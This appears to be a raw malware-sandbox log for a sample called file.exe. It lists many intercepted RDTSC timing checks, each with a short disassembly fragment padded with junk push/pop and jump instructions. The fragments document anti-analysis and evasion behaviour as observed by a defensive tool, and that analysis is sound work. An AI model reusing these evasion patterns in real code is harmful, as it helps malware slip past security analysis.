Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C9DA2 second address: 11C9DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F8725Ch 0x00000007 je 00007FCC24F87256h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007FCC24F87256h 0x00000016 jnp 00007FCC24F87256h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C9DC7 second address: 11C9DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C93E2 second address: 11C93F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 jl 00007FCC24F8727Fh 0x0000000c js 00007FCC24F8725Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C93F6 second address: 11C940D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCC24D2113Fh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C9FFF second address: 11CA012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCC24F87256h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FCC24F87256h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA012 second address: 11CA016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA016 second address: 11CA01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA5B8 second address: 11CA5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA5BC second address: 11CA5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F8725Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA5CF second address: 11CA5E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCC24D21143h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CA5E6 second address: 11CA5EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118161D second address: 1181623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181623 second address: 1181627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181627 second address: 118162B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181D0B second address: 1181D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181DA4 second address: 1181DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D2113Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181F16 second address: 1181F74 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCC24F87258h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push ebx 0x0000000f jmp 00007FCC24F8725Ch 0x00000014 pop ebx 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ebx 0x0000001b push ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push esi 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pop esi 0x00000027 jmp 00007FCC24F87260h 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jnp 00007FCC24F87275h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FCC24F87263h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11821E6 second address: 11821EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118296A second address: 118296E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CF816 second address: 11CF81A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CF81A second address: 11CF835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCC24F8725Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CFC76 second address: 11CFC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CFC7A second address: 11CFC80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CFF7D second address: 11CFF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CFF84 second address: 11CFF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCC24F87256h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D021F second address: 11D0223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D0223 second address: 11D0229 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D0229 second address: 11D024F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCC24D21141h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FCC24D2113Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D024F second address: 11D0262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FCC24F8725Ah 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D0262 second address: 11D028B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21146h 0x00000007 js 00007FCC24D21136h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D028B second address: 11D0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D0296 second address: 11D029A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D029A second address: 11D02A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D02A0 second address: 11D02C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FCC24D21136h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FCC24D21143h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D02C4 second address: 11D02CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D02CA second address: 11D02D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6280 second address: 11D6298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FCC24F8725Dh 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6298 second address: 11D62B2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCC24D21136h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jl 00007FCC24D21136h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D62B2 second address: 11D62B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6455 second address: 11D6472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21146h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6472 second address: 11D6494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCC24F87256h 0x0000000a jmp 00007FCC24F87267h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6494 second address: 11D64A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCC24D21142h 0x00000008 jng 00007FCC24D21136h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D65E5 second address: 11D65E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D65E9 second address: 11D65FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FCC24D21164h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D65FA second address: 11D6615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCC24F87260h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D6615 second address: 11D6619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D679E second address: 11D67A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8A52 second address: 11D8A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8A56 second address: 11D8A65 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCC24F87256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D8BD5 second address: 11D8BE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCC24D21136h 0x00000008 jnc 00007FCC24D21136h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF654 second address: 11DF658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF658 second address: 11DF668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCC24D21136h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF668 second address: 11DF66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF66C second address: 11DF6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21141h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FCC24D2113Bh 0x00000011 jmp 00007FCC24D21146h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jns 00007FCC24D21136h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DDFB8 second address: 11DDFBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE0ED second address: 11DE0F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE4A7 second address: 11DE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE4AD second address: 11DE4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FCC24D21147h 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE4D3 second address: 11DE4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE4D7 second address: 11DE500 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007FCC24D21136h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCC24D21149h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE65E second address: 11DE682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FCC24F87269h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE682 second address: 11DE6A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007FCC24D2113Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FCC24D21136h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE6A0 second address: 11DE6B4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCC24F87256h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FCC24F87258h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE7FE second address: 11DE828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCC24D21136h 0x0000000a popad 0x0000000b jno 00007FCC24D2113Ch 0x00000011 jmp 00007FCC24D2113Eh 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE968 second address: 11DE96C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE96C second address: 11DE972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DE972 second address: 11DE977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF365 second address: 11DF369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DF369 second address: 11DF397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007FCC24F87256h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCC24F87266h 0x00000017 jg 00007FCC24F87256h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E294E second address: 11E2964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push ecx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E2964 second address: 11E296D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E296D second address: 11E2973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E2973 second address: 11E2977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E2977 second address: 11E297B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E2C65 second address: 11E2C8A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCC24F8725Eh 0x00000010 jmp 00007FCC24F8725Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E2FCC second address: 11E2FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E2FD1 second address: 11E2FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E310D second address: 11E3111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E3111 second address: 11E3115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E3115 second address: 11E3132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D21147h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E3132 second address: 11E3137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E3137 second address: 11E3143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCC24D21136h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E784B second address: 11E784F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E784F second address: 11E785D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCC24D21138h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E70D6 second address: 11E70E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCC24F87256h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E70E2 second address: 11E70F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCC24D2113Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E70F7 second address: 11E70FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E7261 second address: 11E726B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCC24D21136h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E726B second address: 11E7277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E7277 second address: 11E727D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E727D second address: 11E72C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F8725Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FCC24F8725Eh 0x0000000f jnp 00007FCC24F87274h 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8DCC second address: 11E8DED instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCC24D21136h 0x00000008 jmp 00007FCC24D2113Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FCC24D21136h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E8DED second address: 11E8DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F0532 second address: 11F054D instructions: 0x00000000 rdtsc 0x00000002 je 00007FCC24D21141h 0x00000008 jmp 00007FCC24D2113Bh 0x0000000d js 00007FCC24D21146h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F054D second address: 11F0570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24F8725Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FCC24F8725Dh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F0570 second address: 11F0595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FCC24D21148h 0x0000000b je 00007FCC24D2113Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
